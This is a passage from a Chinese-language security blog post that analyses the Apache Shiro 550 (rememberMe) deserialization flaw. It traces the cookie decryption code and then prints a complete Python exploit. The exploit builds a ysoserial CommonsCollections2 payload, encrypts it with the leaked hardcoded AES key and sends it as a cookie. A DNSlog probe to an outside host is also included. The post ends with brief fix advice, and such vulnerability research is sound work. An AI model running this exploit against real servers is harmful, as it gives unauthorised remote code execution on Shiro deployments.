<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxNDA0NDgucG5n?x-oss-process=image/format,png" alt="image-20200902140447964"></p>
<p>然后 readValue 方法，根据 Cookie 中的 name 字段（这个字段就是 rememberMe）获取 Cookie 的值</p>
<p>最终把获取cookie里面的rememberme 给到 value 返回上一级函数</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxNDE4NTIucG5n?x-oss-process=image/format,png" alt="image-20200902141852472"></p>
<p>回到getRememberedSerializedIdentity方法中，使用base64解密，成为二进制的数据，继续向上传递</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">byte[] decoded = Base64.decode(base64);</span><br></pre></td></tr></table></figure>

<ul>
<li><p>再次回到AbstractRememberMeManager 类</p>
</li>
<li><p>下一个流程就是 convertBytesToPrincipals 方法，这就是对应加密的解析数据，中间肯定要解密数据，继续跟入</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxNDI3MTcucG5n?x-oss-process=image/format,png" alt="image-20200902142717154"></p>
</li>
</ul>
<p>进入发现了 decrypt（）函数，这就很明显就进行解密了，继续跟入</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> PrincipalCollection <span class="title function_">convertBytesToPrincipals</span><span class="params">(<span class="type">byte</span>[] bytes, SubjectContext subjectContext)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">this</span>.getCipherService() != <span class="literal">null</span>) &#123;</span><br><span class="line">        bytes = <span class="built_in">this</span>.decrypt(bytes);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">this</span>.deserialize(bytes);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxNDI5NDUucG5n?x-oss-process=image/format,png" alt="image-20200902142945142"></p>
<h3 id="详细看看decrypt解密函数："><a href="#详细看看decrypt解密函数：" class="headerlink" title="详细看看decrypt解密函数："></a>详细看看decrypt解密函数：</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="type">byte</span>[] decrypt(<span class="type">byte</span>[] encrypted) &#123;</span><br><span class="line">    <span class="type">byte</span>[] serialized = encrypted;</span><br><span class="line">    <span class="type">CipherService</span> <span class="variable">cipherService</span> <span class="operator">=</span> <span class="built_in">this</span>.getCipherService();</span><br><span class="line">    <span class="keyword">if</span> (cipherService != <span class="literal">null</span>) &#123;</span><br><span class="line">        <span class="type">ByteSource</span> <span class="variable">byteSource</span> <span class="operator">=</span> cipherService.decrypt(encrypted, <span class="built_in">this</span>.getDecryptionCipherKey());</span><br><span class="line">        serialized = byteSource.getBytes();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> serialized;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>getCipherService();老熟人了，获取加密方法：AES&#x2F;CBC&#x2F;PKCS5Padding</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxNDM0MTgucG5n?x-oss-process=image/format,png" alt="image-20200902143418030"></p>
<p>最后到这句话，获取老朋友AES的秘钥 getDecryptionCipherKey()后，带着秘文和AES公钥进入decrypt函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">ByteSource</span> <span class="variable">byteSource</span> <span class="operator">=</span> cipherService.decrypt(encrypted, <span class="built_in">this</span>.getDecryptionCipherKey());</span><br></pre></td></tr></table></figure>

<p>跟进到了JcaCipherService的decrypt函数里面：分析一下里面的逻辑</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> ByteSource <span class="title function_">decrypt</span><span class="params">(<span class="type">byte</span>[] ciphertext, <span class="type">byte</span>[] key)</span> <span class="keyword">throws</span> CryptoException &#123;</span><br><span class="line">    <span class="type">byte</span>[] encrypted = ciphertext;</span><br><span class="line">    <span class="type">byte</span>[] iv = <span class="literal">null</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">this</span>.isGenerateInitializationVectors(<span class="literal">false</span>)) &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">int</span> <span class="variable">ivSize</span> <span class="operator">=</span> <span class="built_in">this</span>.getInitializationVectorSize();</span><br><span class="line">            <span class="type">int</span> <span class="variable">ivByteSize</span> <span class="operator">=</span> ivSize / <span class="number">8</span>;</span><br><span class="line">            iv = <span class="keyword">new</span> <span class="title class_">byte</span>[ivByteSize];</span><br><span class="line">          	</span><br><span class="line">          	<span class="comment">//ivByteSize=16</span></span><br><span class="line">          	<span class="comment">//ciphertext这个数组 0-16位 覆盖到 iv数组 ，相当于给 vi赋值 ciphertext的前16位</span></span><br><span class="line">            System.arraycopy(ciphertext, <span class="number">0</span>, iv, <span class="number">0</span>, ivByteSize);</span><br><span class="line">          </span><br><span class="line">          	<span class="comment">// </span></span><br><span class="line">            <span class="type">int</span> <span class="variable">encryptedSize</span> <span class="operator">=</span> ciphertext.length - ivByteSize;</span><br><span class="line">            encrypted = <span class="keyword">new</span> <span class="title class_">byte</span>[encryptedSize];</span><br><span class="line">          	</span><br><span class="line">           	<span class="comment">// ciphertext数组 ，从 16位后面的数据 赋值给encrypted </span></span><br><span class="line">            System.arraycopy(ciphertext, ivByteSize, encrypted, <span class="number">0</span>, encryptedSize);</span><br><span class="line">          </span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception var8) &#123;</span><br><span class="line">            <span class="type">String</span> <span class="variable">msg</span> <span class="operator">=</span> <span class="string">&quot;Unable to correctly extract the Initialization Vector or ciphertext.&quot;</span>;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">CryptoException</span>(msg, var8);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  <span class="comment">//进入下一层解密</span></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">this</span>.decrypt(encrypted, key, iv);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>追随到 JcaCipherService 的 decrypt 方法中，继续跟入 crypt 方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> ByteSource <span class="title function_">decrypt</span><span class="params">(<span class="type">byte</span>[] ciphertext, <span class="type">byte</span>[] key, <span class="type">byte</span>[] iv)</span> <span class="keyword">throws</span> CryptoException &#123;</span><br><span class="line">    <span class="keyword">if</span> (log.isTraceEnabled()) &#123;</span><br><span class="line">        log.trace(<span class="string">&quot;Attempting to decrypt incoming byte array of length &quot;</span> + (ciphertext != <span class="literal">null</span> ? ciphertext.length : <span class="number">0</span>));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">byte</span>[] decrypted = <span class="built_in">this</span>.crypt(ciphertext, key, iv, <span class="number">2</span>);</span><br><span class="line">    <span class="keyword">return</span> decrypted == <span class="literal">null</span> ? <span class="literal">null</span> : Util.bytes(decrypted);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跑到 JcaCipherService 中的 crypt 方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="type">byte</span>[] crypt(<span class="type">byte</span>[] bytes, <span class="type">byte</span>[] key, <span class="type">byte</span>[] iv, <span class="type">int</span> mode) <span class="keyword">throws</span> IllegalArgumentException, CryptoException &#123;</span><br><span class="line">    <span class="keyword">if</span> (key != <span class="literal">null</span> &amp;&amp; key.length != <span class="number">0</span>) &#123;</span><br><span class="line">      </span><br><span class="line">   			<span class="comment">//初始化cipher，再跟入就是 原生的 cipher.init 解密方法了</span></span><br><span class="line">        <span class="type">Cipher</span> <span class="variable">cipher</span> <span class="operator">=</span> <span class="built_in">this</span>.initNewCipher(mode, key, iv, <span class="literal">false</span>);</span><br><span class="line">      	<span class="comment">// 基本完成解密</span></span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">this</span>.crypt(cipher, bytes);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">IllegalArgumentException</span>(<span class="string">&quot;key argument cannot be null or empty.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="解密完成，序列化操作"><a href="#解密完成，序列化操作" class="headerlink" title="解密完成，序列化操作"></a>解密完成，序列化操作</h2><p>解密完成后，一步步的return回到上级函数，回到AbstractRememberMeManager 的 decrypt 方法，看一下数据 r00 开头 序列化的数据</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxNjE5NDcucG5n?x-oss-process=image/format,png" alt="image-20200902161947628"></p>
<p>向上return，看到deserialize 反序列化的方法了</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxNjI2NDcucG5n?x-oss-process=image/format,png" alt="image-20200902162647497"></p>
<p>一直跟进到 DefaultSerializer 的 deserialize方法中，见到了久违的 readObject（）方法</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIxNjI4MTkucG5n?x-oss-process=image/format,png" alt="image-20200902162819610"></p>
<h1 id="0x04-编写POC-EXP"><a href="#0x04-编写POC-EXP" class="headerlink" title="0x04 编写POC EXP"></a>0x04 编写POC EXP</h1><h2 id="本次AES加密的一些小知识点："><a href="#本次AES加密的一些小知识点：" class="headerlink" title="本次AES加密的一些小知识点："></a>本次AES加密的一些小知识点：</h2><ul>
<li>某些加密算法要求明文需要按一定长度对齐，叫做块大小(BlockSize)，我们这次就是16字节，那么对于一段任意的数据，加密前需要对最后一个块填充到16 字节，解密后需要删除掉填充的数据。</li>
<li>AES中有三种填充模式(PKCS7Padding&#x2F;PKCS5Padding&#x2F;ZeroPadding)</li>
<li>PKCS7Padding跟PKCS5Padding的区别就在于数据填充方式，PKCS7Padding是缺几个字节就补几个字节的0，而PKCS5Padding是缺几个字节就补充几个字节的几，好比缺6个字节，就补充6个字节的6</li>
</ul>
<p>加密流程就是：</p>
<ul>
<li><p>使用的 AES&#x2F;CBC&#x2F;PKCS5Padding 模式</p>
</li>
<li><p>random &#x3D; this.ensureSecureRandom(); 使用随机数生成 ivBytes</p>
</li>
<li><p>key为预留的那个硬编码</p>
</li>
<li><p>encrypt(plaintext, key, ivBytes, generate) 生成</p>
</li>
<li><p>最后base64加密，放入cookie中</p>
</li>
</ul>
<p>解密流程可以知道：</p>
<ul>
<li><p>使用的 AES&#x2F;CBC&#x2F;PKCS5Padding 模式 ，所以Key要求是为16位的，key为预留的那个硬编码</p>
</li>
<li><p>base64解密cookie 中 rememberMe的值</p>
</li>
<li><p>根据解密 vi 是 秘文的前16位</p>
</li>
<li><p>iv即为rememberMe解码后的前16个字节</p>
</li>
<li><p>有了key 和 vi 就可以解密到反序列化的数据了</p>
</li>
</ul>
<p>那POC的我们的加密流程就是：</p>
<ol>
<li>获取到 反序列化的数据</li>
<li>设置AES加密模式，使用AES.MODE_CBC的分块模式</li>
<li>设置硬编码的 key</li>
<li>使用随机数生成 16 字节的 iv</li>
<li>使用 iv + AES加密(反序列化数据) 拼接</li>
<li>最后base64加密全部内容</li>
</ol>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><p>这里主要导入的是这个版本的apache.commons</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;groupId&gt;org.apache.commons&lt;/groupId&gt;</span><br><span class="line">&lt;artifactId&gt;commons-collections4&lt;/artifactId&gt;</span><br><span class="line">&lt;version&gt;4.0&lt;/version&gt;</span><br></pre></td></tr></table></figure>

<p>所以我们EXP利用CommonsCollections2 的利用链</p>
<p>主要依靠ysoserial生成利用的反序列化数据，然后根据加密的思路，把利用链加进去。</p>
<h2 id="Python代码"><a href="#Python代码" class="headerlink" title="Python代码"></a>Python代码</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">encode_rememberme</span>(<span class="params">command</span>):</span><br><span class="line">    <span class="comment"># 这里使用CommonsCollections2模块</span></span><br><span class="line">    popen = subprocess.Popen([<span class="string">&#x27;java&#x27;</span>, <span class="string">&#x27;-jar&#x27;</span>, <span class="string">&#x27;ysoserial.jar&#x27;</span>, <span class="string">&#x27;CommonsCollections2&#x27;</span>, command], stdout=subprocess.PIPE)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 明文需要按一定长度对齐，叫做块大小BlockSize 这个块大小是 block_size = 16 字节</span></span><br><span class="line">    BS = AES.block_size</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 按照加密规则按一定长度对齐,如果不够要要做填充对齐</span></span><br><span class="line">    pad = <span class="keyword">lambda</span> s: s + ((BS - <span class="built_in">len</span>(s) % BS) * <span class="built_in">chr</span>(BS - <span class="built_in">len</span>(s) % BS)).encode()</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 泄露的key</span></span><br><span class="line">    key = <span class="string">&quot;kPH+bIxk5D2deZiIxcaaaA==&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># AES的CBC加密模式</span></span><br><span class="line">    mode = AES.MODE_CBC</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 使用uuid4基于随机数模块生成16字节的 iv向量</span></span><br><span class="line">    iv = uuid.uuid4().<span class="built_in">bytes</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># 实例化一个加密方式为上述的对象</span></span><br><span class="line">    encryptor = AES.new(base64.b64decode(key), mode, iv)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 用pad函数去处理yso的命令输出，生成的序列化数据</span></span><br><span class="line">    file_body = pad(popen.stdout.read())</span><br><span class="line"></span><br><span class="line">    <span class="comment"># iv 与 （序列化的AES加密后的数据）拼接， 最终输出生成rememberMe参数</span></span><br><span class="line">    base64_rememberMe_value = base64.b64encode(iv + encryptor.encrypt(file_body))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> base64_rememberMe_value</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dnslog</span>(<span class="params">command</span>):</span><br><span class="line">    popen = subprocess.Popen([<span class="string">&#x27;java&#x27;</span>, <span class="string">&#x27;-jar&#x27;</span>, <span class="string">&#x27;ysoserial.jar&#x27;</span>, <span class="string">&#x27;URLDNS&#x27;</span>, command], stdout=subprocess.PIPE)</span><br><span class="line">    BS = AES.block_size</span><br><span class="line">    pad = <span class="keyword">lambda</span> s: s + ((BS - <span class="built_in">len</span>(s) % BS) * <span class="built_in">chr</span>(BS - <span class="built_in">len</span>(s) % BS)).encode()</span><br><span class="line">    key = <span class="string">&quot;kPH+bIxk5D2deZiIxcaaaA==&quot;</span></span><br><span class="line">    mode = AES.MODE_CBC</span><br><span class="line">    iv = uuid.uuid4().<span class="built_in">bytes</span></span><br><span class="line">    encryptor = AES.new(base64.b64decode(key), mode, iv)</span><br><span class="line">    file_body = pad(popen.stdout.read())</span><br><span class="line">    base64_rememberMe_value = base64.b64encode(iv + encryptor.encrypt(file_body))</span><br><span class="line">    <span class="keyword">return</span> base64_rememberMe_value</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="comment"># cc2的exp</span></span><br><span class="line">    payload = encode_rememberme(<span class="string">&#x27;/System/Applications/Calculator.app/Contents/MacOS/Calculator&#x27;</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;rememberMe=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(payload.decode()))</span><br><span class="line"></span><br><span class="line">    <span class="comment"># dnslog的poc</span></span><br><span class="line">    payload1 = encode_rememberme(<span class="string">&#x27;http://ca4qki.dnslog.cn/&#x27;</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;rememberMe=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(payload1.decode()))</span><br><span class="line"></span><br><span class="line">    cookie = &#123;</span><br><span class="line">        <span class="string">&quot;rememberMe&quot;</span>: payload.decode()</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    requests.get(url=<span class="string">&quot;http://127.0.0.1:8080/web_war/&quot;</span>, cookies=cookie)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="0x05-修复"><a href="#0x05-修复" class="headerlink" title="0x05 修复"></a>0x05 修复</h1><p>1.升级Shiro到最新版</p>
<p>2.升级对应JDK版本到 8u191&#x2F;7u201&#x2F;6u211&#x2F;11.0.1 以上</p>
<p>3.WAF拦截Cookie中长度过大的rememberMe值</p>
<h1 id="0x06-总结"><a href="#0x06-总结" class="headerlink" title="0x06 总结"></a>0x06 总结</h1><p>本次是用ysoserial直接生成序列化内容，而且使用CommonsCollections2这个利用链，只是简单的直接利用，但是实际利用情况十分复杂，关乎java的版本还有各种组件的版本，想要一个完美的利用链还是得自己改造，准备下一篇文章，再研究各种利用链的情况，和改造各种利用链适配问题。</p>
<h1 id="0x07-小trips："><a href="#0x07-小trips：" class="headerlink" title="0x07 小trips："></a>0x07 小trips：</h1><p>如何搜索lib包里面的东西呢？</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA5MDIwOTEzMjMucG5n?x-oss-process=image/format,png" alt="image-20200902091323860"></p>
<p>双击shift , 调出全局搜索框就可以搜索到 jar包里的类了</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://godzeo.github.io">Zeo</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://godzeo.github.io/2020/09/03/Shiro%20550%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%20%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90+poc%E7%BC%96%E5%86%99/">https://godzeo.github.io/2020/09/03/Shiro%20550%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%20%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90+poc%E7%BC%96%E5%86%99/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://godzeo.github.io" target="_blank">Zeo's Security Lab</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2020/09/09/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96/"><img class="prev-cover" src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">PHP代码审计：变量覆盖</div></div></a></div><div class="next-post pull-right"><a href="/2020/08/27/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%93%BECommonsCollections1%E8%AF%A6%E8%A7%A3/"><img class="next-cover" src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Java代码审计：反序列化链CommonsCollections1详解</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231013354.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Zeo</div><div class="author-info__description">专注于安全,分享生活,分享知识</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">125</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">46</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">9</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/godzeo"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/godzeo" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:zzzhhhaaaiiii@gmail.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">Weclome my blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-Shiro-550-%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="toc-number">2.</span> <span class="toc-text">0x01 Shiro 550 漏洞描述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">3.</span> <span class="toc-text">0x02 环境搭建</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E7%8E%AF%E5%A2%83"><span class="toc-number">3.1.</span> <span class="toc-text">基础环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%90%AD%E5%BB%BA%E8%BF%87%E7%A8%8B"><span class="toc-number">3.2.</span> <span class="toc-text">搭建过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A3%E5%B8%B8%E6%90%AD%E5%BB%BA"><span class="toc-number">3.2.1.</span> <span class="toc-text">正常搭建</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9D%91%E7%82%B9%EF%BC%9A"><span class="toc-number">3.3.</span> <span class="toc-text">坑点：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90"><span class="toc-number">4.</span> <span class="toc-text">0x03 代码分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8A%A0%E5%AF%86%E8%BF%87%E7%A8%8B"><span class="toc-number">4.1.</span> <span class="toc-text">加密过程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E5%AF%86%E8%BF%87%E7%A8%8B%EF%BC%9A"><span class="toc-number">4.2.</span> <span class="toc-text">解密过程：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%A6%E7%BB%86%E7%9C%8B%E7%9C%8Bdecrypt%E8%A7%A3%E5%AF%86%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">4.2.1.</span> <span class="toc-text">详细看看decrypt解密函数：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E5%AF%86%E5%AE%8C%E6%88%90%EF%BC%8C%E5%BA%8F%E5%88%97%E5%8C%96%E6%93%8D%E4%BD%9C"><span class="toc-number">4.3.</span> <span class="toc-text">解密完成，序列化操作</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04-%E7%BC%96%E5%86%99POC-EXP"><span class="toc-number">5.</span> <span class="toc-text">0x04 编写POC EXP</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E6%AC%A1AES%E5%8A%A0%E5%AF%86%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A"><span class="toc-number">5.1.</span> <span class="toc-text">本次AES加密的一些小知识点：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-number">5.2.</span> <span class="toc-text">利用思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Python%E4%BB%A3%E7%A0%81"><span 